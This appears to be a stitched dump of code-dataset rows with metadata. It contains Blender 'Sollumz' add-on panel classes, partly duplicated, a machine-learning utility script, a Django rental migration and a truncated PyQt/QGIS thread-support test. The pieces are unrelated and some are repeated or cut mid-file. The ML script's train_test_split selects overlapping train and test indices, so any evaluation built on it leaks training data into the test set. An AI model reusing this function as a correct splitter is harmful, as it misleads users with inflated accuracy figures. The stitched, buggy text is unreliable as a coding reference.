row.operator("sollumz.paint_tex3")
row.operator("sollumz.paint_tex4")
row = layout.row()
row.operator("sollumz.paint_a")
row.prop(context.scene, "vert_paint_alpha")
class SOLLUMZ_PT_YMAP_TOOL_PANEL(bpy.types.Panel):
bl_label = "Ymap Tools"
bl_idname = "SOLLUMZ_PT_YMAP_TOOL_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="FILE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.importymap")
row.operator("sollumz.exportymap")
class SOLLUMZ_PT_OBJECT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAIN_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'object'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
layout.use_property_split = True
obj = context.active_object
row = layout.row()
row.enabled = False
row.prop(obj, "sollum_type")
if not obj or obj.sollum_type == SollumType.NONE:
layout.label(
text="No sollumz objects in scene selected.", icon="ERROR")
class SOLLUMZ_PT_ENTITY_PANEL(bpy.types.Panel):
bl_label = "Entity Definition"
bl_idname = 'SOLLUMZ_PT_ENTITY_PANEL'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_OBJECT_PANEL.bl_idname
@ classmethod
def poll(cls, context):
aobj = context.active_object
return aobj != None and aobj.sollum_type == SollumType.DRAWABLE
def draw(self, context):
layout = self.layout
grid = layout.grid_flow(columns=2, even_columns=True, even_rows=True)
grid.use_property_split = True
aobj = context.active_object
grid.prop(aobj.entity_properties, "flags")
grid.prop(aobj.entity_properties, "guid")
grid.prop(aobj.entity_properties, "parent_index")
grid.prop(aobj.entity_properties, "lod_dist")
grid.prop(aobj.entity_properties, "child_lod_dist")
grid.prop(aobj.entity_properties, "num_children")
grid.prop(aobj.entity_properties, "ambient_occlusion_multiplier")
grid.prop(aobj.entity_properties, "artificial_ambient_occlusion")
grid.prop(aobj.entity_properties, "tint_value")
grid.prop(aobj.entity_properties, "lod_level")
grid.prop(aobj.entity_properties, "priority_level")
class SOLLUMZ_PT_MAT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAT_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'material'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
aobj = context.active_object
if context.active_object == None:
return
mat = aobj.active_material
if not mat or mat.sollum_type == MaterialType.NONE:
layout.label(text="No sollumz material active.", icon="ERROR")
class FlagsPanel:
bl_label = "Flags"
bl_options = {'DEFAULT_CLOSED'}
def get_flags(self, context):
raise NotImplementedError(
f"Failed to display flags. '{self.__class__.__name__}.get_flags()' method not defined.")
def draw(self, context):
data_block = self.get_flags(context)
self.layout.prop(data_block, "total")
self.layout.separator()
grid = self.layout.grid_flow(columns=2)
for index, prop_name in enumerate(data_block.__annotations__):
if index > data_block.size - 1:
break
grid.prop(data_block, prop_name)
class TimeFlagsPanel(FlagsPanel):
bl_label = "Time Flags"
select_operator = None
clear_operator = None
def draw(self, context):
super().draw(context)
if self.select_operator is None or self.clear_operator is None:
raise NotImplementedError(
f"'select_operator' and 'clear_operator' bl_idnames must be defined for {self.__class__.__name__}!")
flags = self.get_flags(context)
row = self.layout.row()
row.operator(self.select_operator)
row.prop(flags, "time_flags_start", text="from")
row.prop(flags, "time_flags_end", text="to")
row = self.layout.row()
row.operator(self.clear_operator)
class SOLLUMZ_MT_sollumz(bpy.types.Menu):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_MT_sollumz"
def draw(self, context):
layout = self.layout
def DrawSollumzMenu(self, context):
self.layout.separator()
self.layout.menu(SOLLUMZ_MT_sollumz.bl_idname, icon="BLENDER")
def register():
bpy.types.VIEW3D_MT_add.append(DrawSollumzMenu)
def unregister():
bpy.types.VIEW3D_MT_add.remove(DrawSollumzMenu)
| <filename>sollumz_ui.py
import bpy
from .sollumz_helper import *
from .sollumz_properties import *
class OrderListHelper:
orderkey = "name"
def filter_items(self, context, data, propname):
helper = bpy.types.UI_UL_list
items = getattr(data, propname)
ordered = helper.sort_items_by_name(items, self.orderkey)
filtered = helper.filter_items_by_name(
self.filter_name, self.bitflag_filter_item, items, propname=self.orderkey, flags=None, reverse=False)
return filtered, ordered
class SOLLUMZ_PT_import_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "batch_mode")
class SOLLUMZ_PT_import_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "join_geometries")
class SOLLUMZ_PT_import_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "split_by_bone")
class SOLLUMZ_PT_import_skeleton(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Skeleton"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "import_ext_skeleton")
class SOLLUMZ_PT_export_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
row = layout.row(align=True)
row.prop(operator.export_settings, "batch_mode")
sub = row.row(align=True)
sub.prop(operator.export_settings, "use_batch_own_dir",
text="", icon='NEWFOLDER')
class SOLLUMZ_PT_export_include(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Include"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
sublayout = layout.column(heading="Limit to")
sublayout.enabled = (operator.export_settings.batch_mode == "OFF")
sublayout.prop(operator.export_settings, "use_selection")
sublayout.prop(operator.export_settings, "use_active_collection")
col = layout.column()
col.prop(operator.export_settings, "sollum_types")
class SOLLUMZ_PT_export_exclude(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Exclude"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "exclude_skeleton")
class SOLLUMZ_PT_export_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "use_transforms")
class SOLLUMZ_PT_export_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 4
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "export_with_hi")
class SOLLUMZ_PT_TOOL_PANEL(bpy.types.Panel):
bl_label = "General Tools"
bl_idname = "SOLLUMZ_PT_TOOL_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_order = 0
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="MODIFIER_DATA")
def draw(self, context):
layout = self.layout
layout.label(text="View")
layout.prop(context.scene, "hide_collision")
layout.prop(context.scene, "hide_high_lods")
layout.prop(context.scene, "hide_medium_lods")
layout.prop(context.scene, "hide_low_lods")
layout.prop(context.scene, "hide_very_low_lods")
layout.prop(context.space_data.overlay,
"show_bones", text="Show Skeleton")
class SOLLUMZ_PT_DEBUG_PANEL(bpy.types.Panel):
bl_label = "Debug"
bl_idname = "SOLLUMZ_PT_DEBUG_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="PREFERENCES")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.debug_hierarchy")
row.prop(context.scene, "debug_sollum_type")
class SOLLUMZ_PT_VERTEX_TOOL_PANEL(bpy.types.Panel):
bl_label = "Vertex Painter"
bl_idname = "SOLLUMZ_PT_VERTEX_TOOL_PANELL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="BRUSH_DATA")
def draw(self, context):
layout = self.layout
row = layout.row()
row.prop(context.scene, "vert_paint_color")
row.operator("sollumz.paint_vertices")
class SOLLUMZ_PT_TERRAIN_PAINTER_PANEL(bpy.types.Panel):
bl_label = "Terrain Painter"
bl_idname = "SOLLUMZ_PT_TERRAIN_PAINTER_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_VERTEX_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="IMAGE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.paint_tex1")
row.operator("sollumz.paint_tex2")
row = layout.row()
row.operator("sollumz.paint_tex3")
row.operator("sollumz.paint_tex4")
row = layout.row()
row.operator("sollumz.paint_a")
row.prop(context.scene, "vert_paint_alpha")
class SOLLUMZ_PT_YMAP_TOOL_PANEL(bpy.types.Panel):
bl_label = "Ymap Tools"
bl_idname = "SOLLUMZ_PT_YMAP_TOOL_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="FILE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.importymap")
row.operator("sollumz.exportymap")
class SOLLUMZ_PT_OBJECT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAIN_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'object'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
layout.use_property_split = True
obj = context.active_object
row = layout.row()
row.enabled = False
row.prop(obj, "sollum_type")
if not obj or obj.sollum_type == SollumType.NONE:
layout.label(
text="No sollumz objects in scene selected.", icon="ERROR")
class SOLLUMZ_PT_ENTITY_PANEL(bpy.types.Panel):
bl_label = "Entity Definition"
bl_idname = 'SOLLUMZ_PT_ENTITY_PANEL'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_OBJECT_PANEL.bl_idname
@ classmethod
def poll(cls, context):
aobj = context.active_object
return aobj != None and aobj.sollum_type == SollumType.DRAWABLE
def draw(self, context):
layout = self.layout
grid = layout.grid_flow(columns=2, even_columns=True, even_rows=True)
grid.use_property_split = True
aobj = context.active_object
grid.prop(aobj.entity_properties, "flags")
grid.prop(aobj.entity_properties, "guid")
grid.prop(aobj.entity_properties, "parent_index")
grid.prop(aobj.entity_properties, "lod_dist")
grid.prop(aobj.entity_properties, "child_lod_dist")
grid.prop(aobj.entity_properties, "num_children")
grid.prop(aobj.entity_properties, "ambient_occlusion_multiplier")
grid.prop(aobj.entity_properties, "artificial_ambient_occlusion")
grid.prop(aobj.entity_properties, "tint_value")
grid.prop(aobj.entity_properties, "lod_level")
grid.prop(aobj.entity_properties, "priority_level")
class SOLLUMZ_PT_MAT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAT_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'material'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
aobj = context.active_object
if context.active_object == None:
return
mat = aobj.active_material
if not mat or mat.sollum_type == MaterialType.NONE:
layout.label(text="No sollumz material active.", icon="ERROR")
class FlagsPanel:
bl_label = "Flags"
bl_options = {'DEFAULT_CLOSED'}
def get_flags(self, context):
raise NotImplementedError(
f"Failed to display flags. '{self.__class__.__name__}.get_flags()' method not defined.")
def draw(self, context):
data_block = self.get_flags(context)
self.layout.prop(data_block, "total")
self.layout.separator()
grid = self.layout.grid_flow(columns=2)
for index, prop_name in enumerate(data_block.__annotations__):
if index > data_block.size - 1:
break
grid.prop(data_block, prop_name)
class TimeFlagsPanel(FlagsPanel):
bl_label = "Time Flags"
select_operator = None
clear_operator = None
def draw(self, context):
super().draw(context)
if self.select_operator is None or self.clear_operator is None:
raise NotImplementedError(
f"'select_operator' and 'clear_operator' bl_idnames must be defined for {self.__class__.__name__}!")
flags = self.get_flags(context)
row = self.layout.row()
row.operator(self.select_operator)
row.prop(flags, "time_flags_start", text="from")
row.prop(flags, "time_flags_end", text="to")
row = self.layout.row()
row.operator(self.clear_operator)
class SOLLUMZ_MT_sollumz(bpy.types.Menu):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_MT_sollumz"
def draw(self, context):
layout = self.layout
def DrawSollumzMenu(self, context):
self.layout.separator()
self.layout.menu(SOLLUMZ_MT_sollumz.bl_idname, icon="BLENDER")
def register():
bpy.types.VIEW3D_MT_add.append(DrawSollumzMenu)
def unregister():
bpy.types.VIEW3D_MT_add.remove(DrawSollumzMenu)
| en | 0.669385 | # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything | 2.176916 | 2 |
Useful scripts/UsefulScripts.py | SathyaKrishnan1211/Medium-Article-Code | 0 | 6632529 | <gh_stars>0
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from low_key.metrics import precision_binary,recall_binary,accuracy_score,f1_score
def train_test_split(X,y,test_size=0.2,random_state=42):
"""
Accepts only a dataframe or a numpy array as input.
:param X: input data X
:param y: input data y
:param test_size: specifies the size of the test dataset.
:param random_state: seed for shuffling the data
:return: X_train,X_test,y_train,y_test
"""
np.random.seed(random_state)
shuffled_index = np.random.permutation(len(X))
train_indices = shuffled_index[:int(len(X)*(1-test_size))]
test_indices = shuffled_index[int(len(X)*test_size):]
if type(X)==type(pd.DataFrame(data={1:[2,3]})):
X_train,X_test,y_train,y_test = X.iloc[train_indices],X.iloc[test_indices],y.iloc[train_indices],y.iloc[test_indices]
return X_train, X_test, y_train, y_test
elif type(X)==type(np.array([1,2])):
X_train,X_test,y_train,y_test = X[train_indices],X[test_indices],y[train_indices],y[test_indices]
return X_train, X_test, y_train, y_test
else:
raise TypeError("Only dataframes and numpy arrays are accepted as input")
def plot_decision_boundary(classifier,X,y,resolution=0.02,markers=None,colors=None):
"""
This is a function that is used to visualize the boundaries predicted by classifiers to classify the training data.
This function only takes uses two features even if more than two are given.
:param classifier: classifier model that is used to predict the labels
:param X: training data
:param y: training label
:param resolution: resolution of the plot
:param markers: markers for different classes
:param colors: colors for different classes
:return: a figure consisting of the boundaries for each class
"""
if markers==None:
markers = ['*','s','o']
if colors==None:
colors = ['blue','red','orange']
x_min,x_max = X[:,0].min()-0.1,X[:,0].max()+0.1 # x-axis range
y_min,y_max = X[:,1].min()-0.1,X[:,1].max()+0.1 # y_axis range
xx,yy = np.meshgrid(np.arange(x_min,x_max,resolution),
np.arange(y_min,y_max,resolution)) # creating a 2x2 array for the figure
classifier = classifier.fit(X,y)
Z = classifier.predict(np.c_[np.ravel(xx),np.ravel(yy)])
Z = Z.reshape(xx.shape)
plt.contourf(xx,yy,Z) # the contour plot
for i in np.unique(y):
plt.scatter(X[y==i,0],X[y==i,1],color=colors[i],marker=markers[i],label=i)
plt.legend()
plt.show()
def classifiers_metrics(models,X,y,test_size=0.1,random_state=42):
"""
:param models: a list or a numpy array consisting of classification models
:param X: The whole feature set. It need not be split into training and test sets
:param y: The whole true target labels.
:param test_size: Size of the test data
:param random_state: Specifies the random seed for splitting the dataset
:return: returns a dataframe consisting of precision, recall, f1_score and accuracy of all the classifiers passed
"""
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=test_size,random_state=random_state)
precision_list,recall_list,accuracy_list,f1_list = [],[],[],[]
if type(models)!=type([1,2,3]) and type(models)!=type(np.array([1,2,3])):
raise TypeError("models should be of type list or numpy array")
for model in models:
model = model.fit(X_train,y_train)
y_pred = model.predict(X_test)
precision_list.append(precision_binary(y_test,y_pred))
recall_list.append(recall_binary(y_test,y_pred))
accuracy_list.append(accuracy_score(y_test,y_pred))
f1_list.append(f1_score(y_test,y_pred))
metric_df = pd.DataFrame(index=models,data={"Precision":precision_list,
"Recall":recall_list,
"Accuracy":accuracy_list,
"F1 Score":f1_list})
return metric_df
def gini_impurity(value_set):
# node impurity measurement for decision tree
total_num = np.sum(value_set)
gini = 1
for j in value_set:
gini -= (j/total_num)**2
return np.round(gini,3)
def log_loss(y_true,y_proba):
import numpy as np
avg_loss = 0
for i,j in zip(y_true,y_proba):
log_loss = -1*(i*np.log(j) + (1-i)*np.log(1-j))
avg_loss += log_loss
return avg_loss/len(y_true) | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from low_key.metrics import precision_binary,recall_binary,accuracy_score,f1_score
def train_test_split(X,y,test_size=0.2,random_state=42):
"""
Accepts only a dataframe or a numpy array as input.
:param X: input data X
:param y: input data y
:param test_size: specifies the size of the test dataset.
:param random_state: seed for shuffling the data
:return: X_train,X_test,y_train,y_test
"""
np.random.seed(random_state)
shuffled_index = np.random.permutation(len(X))
train_indices = shuffled_index[:int(len(X)*(1-test_size))]
test_indices = shuffled_index[int(len(X)*test_size):]
if type(X)==type(pd.DataFrame(data={1:[2,3]})):
X_train,X_test,y_train,y_test = X.iloc[train_indices],X.iloc[test_indices],y.iloc[train_indices],y.iloc[test_indices]
return X_train, X_test, y_train, y_test
elif type(X)==type(np.array([1,2])):
X_train,X_test,y_train,y_test = X[train_indices],X[test_indices],y[train_indices],y[test_indices]
return X_train, X_test, y_train, y_test
else:
raise TypeError("Only dataframes and numpy arrays are accepted as input")
def plot_decision_boundary(classifier,X,y,resolution=0.02,markers=None,colors=None):
"""
This is a function that is used to visualize the boundaries predicted by classifiers to classify the training data.
This function only takes uses two features even if more than two are given.
:param classifier: classifier model that is used to predict the labels
:param X: training data
:param y: training label
:param resolution: resolution of the plot
:param markers: markers for different classes
:param colors: colors for different classes
:return: a figure consisting of the boundaries for each class
"""
if markers==None:
markers = ['*','s','o']
if colors==None:
colors = ['blue','red','orange']
x_min,x_max = X[:,0].min()-0.1,X[:,0].max()+0.1 # x-axis range
y_min,y_max = X[:,1].min()-0.1,X[:,1].max()+0.1 # y_axis range
xx,yy = np.meshgrid(np.arange(x_min,x_max,resolution),
np.arange(y_min,y_max,resolution)) # creating a 2x2 array for the figure
classifier = classifier.fit(X,y)
Z = classifier.predict(np.c_[np.ravel(xx),np.ravel(yy)])
Z = Z.reshape(xx.shape)
plt.contourf(xx,yy,Z) # the contour plot
for i in np.unique(y):
plt.scatter(X[y==i,0],X[y==i,1],color=colors[i],marker=markers[i],label=i)
plt.legend()
plt.show()
def classifiers_metrics(models,X,y,test_size=0.1,random_state=42):
"""
:param models: a list or a numpy array consisting of classification models
:param X: The whole feature set. It need not be split into training and test sets
:param y: The whole true target labels.
:param test_size: Size of the test data
:param random_state: Specifies the random seed for splitting the dataset
:return: returns a dataframe consisting of precision, recall, f1_score and accuracy of all the classifiers passed
"""
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=test_size,random_state=random_state)
precision_list,recall_list,accuracy_list,f1_list = [],[],[],[]
if type(models)!=type([1,2,3]) and type(models)!=type(np.array([1,2,3])):
raise TypeError("models should be of type list or numpy array")
for model in models:
model = model.fit(X_train,y_train)
y_pred = model.predict(X_test)
precision_list.append(precision_binary(y_test,y_pred))
recall_list.append(recall_binary(y_test,y_pred))
accuracy_list.append(accuracy_score(y_test,y_pred))
f1_list.append(f1_score(y_test,y_pred))
metric_df = pd.DataFrame(index=models,data={"Precision":precision_list,
"Recall":recall_list,
"Accuracy":accuracy_list,
"F1 Score":f1_list})
return metric_df
def gini_impurity(value_set):
# node impurity measurement for decision tree
total_num = np.sum(value_set)
gini = 1
for j in value_set:
gini -= (j/total_num)**2
return np.round(gini,3)
def log_loss(y_true,y_proba):
import numpy as np
avg_loss = 0
for i,j in zip(y_true,y_proba):
log_loss = -1*(i*np.log(j) + (1-i)*np.log(1-j))
avg_loss += log_loss
return avg_loss/len(y_true) | en | 0.736494 | Accepts only a dataframe or a numpy array as input.
:param X: input data X
:param y: input data y
:param test_size: specifies the size of the test dataset.
:param random_state: seed for shuffling the data
:return: X_train,X_test,y_train,y_test This is a function that is used to visualize the boundaries predicted by classifiers to classify the training data.
This function only takes uses two features even if more than two are given.
:param classifier: classifier model that is used to predict the labels
:param X: training data
:param y: training label
:param resolution: resolution of the plot
:param markers: markers for different classes
:param colors: colors for different classes
:return: a figure consisting of the boundaries for each class # x-axis range # y_axis range # creating a 2x2 array for the figure # the contour plot :param models: a list or a numpy array consisting of classification models
:param X: The whole feature set. It need not be split into training and test sets
:param y: The whole true target labels.
:param test_size: Size of the test data
:param random_state: Specifies the random seed for splitting the dataset
:return: returns a dataframe consisting of precision, recall, f1_score and accuracy of all the classifiers passed # node impurity measurement for decision tree | 3.955219 | 4 |
rental/migrations/0001_initial.py | rbed/DjangoOne | 0 | 6632530 | <filename>rental/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-10 05:48
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shelf', '0003_auto_20170810_0748'),
]
operations = [
migrations.CreateModel(
name='Rental',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('when', models.DateTimeField(default=datetime.datetime(2017, 8, 10, 5, 47, 22, 863277, tzinfo=utc))),
('returned', models.DateTimeField(blank=True, null=True)),
('what', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shelf.BookItem')),
('who', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| <filename>rental/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-10 05:48
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shelf', '0003_auto_20170810_0748'),
]
operations = [
migrations.CreateModel(
name='Rental',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('when', models.DateTimeField(default=datetime.datetime(2017, 8, 10, 5, 47, 22, 863277, tzinfo=utc))),
('returned', models.DateTimeField(blank=True, null=True)),
('what', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shelf.BookItem')),
('who', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| en | 0.777942 | # -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2017-08-10 05:48 | 1.700906 | 2 |
tests/integration/thread_support/test_run.py | pyqgis/plutil | 0 | 6632531 | <filename>tests/integration/thread_support/test_run.py
# -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
class WorkerThread(ThreadSide, threading.Thread):
def __init__(self, *args, **kwargs):
super(WorkerThread, self).__init__(name="WorkerThread", *args, **kwargs)
# Set this to terminate the thread.
self.stop = threading.Event()
def run(self):
self.thread_side_started()
while not self.stop.is_set():
pass
class AMessage(TsMessage):
def __init__(self, *args, **kwargs):
super(AMessage, self).__init__(*args, **kwargs)
self.on_thread_side_called = 0
self.on_on_gui_side = 0
def on_thread_side(self):
""" Executed just before the messages leaves the thread side. """
self.on_thread_side_called = self.on_thread_side_called + 1
def on_gui_side(self):
""" Executed when the message has reached GUI side. """
self.on_on_gui_side = self.on_on_gui_side + 1
class TestTestee(TestCase):
def setUp(self):
self.plugin = MagicMock()
self.app = QCoreApplication([])
self.thread = WorkerThread(self.plugin)
self.testee = GuiSide()
self.testee.tie(self.thread)
self.thread.start()
sleep(0.5)
self.testee.receiver()
def tearDown(self):
self.thread.stop.set()
self.testee = None
self.app.exit()
def test_init(self):
logger.debug("Run GuiSide/ThreadSide test starting")
self.app.processEvents(QEventLoop.AllEvents, 1)
sleep(0.2)
self.assertEqual(self.thread.state, self.thread.STATE_CONNECTED)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
self.assertEqual(msg.on_thread_side_called, 1)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
self.assertEqual(msg.on_thread_side_called, 1)
logger.debug("Run GuiSide/ThreadSide test ends")
| <filename>tests/integration/thread_support/test_run.py
# -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
class WorkerThread(ThreadSide, threading.Thread):
def __init__(self, *args, **kwargs):
super(WorkerThread, self).__init__(name="WorkerThread", *args, **kwargs)
# Set this to terminate the thread.
self.stop = threading.Event()
def run(self):
self.thread_side_started()
while not self.stop.is_set():
pass
class AMessage(TsMessage):
def __init__(self, *args, **kwargs):
super(AMessage, self).__init__(*args, **kwargs)
self.on_thread_side_called = 0
self.on_on_gui_side = 0
def on_thread_side(self):
""" Executed just before the messages leaves the thread side. """
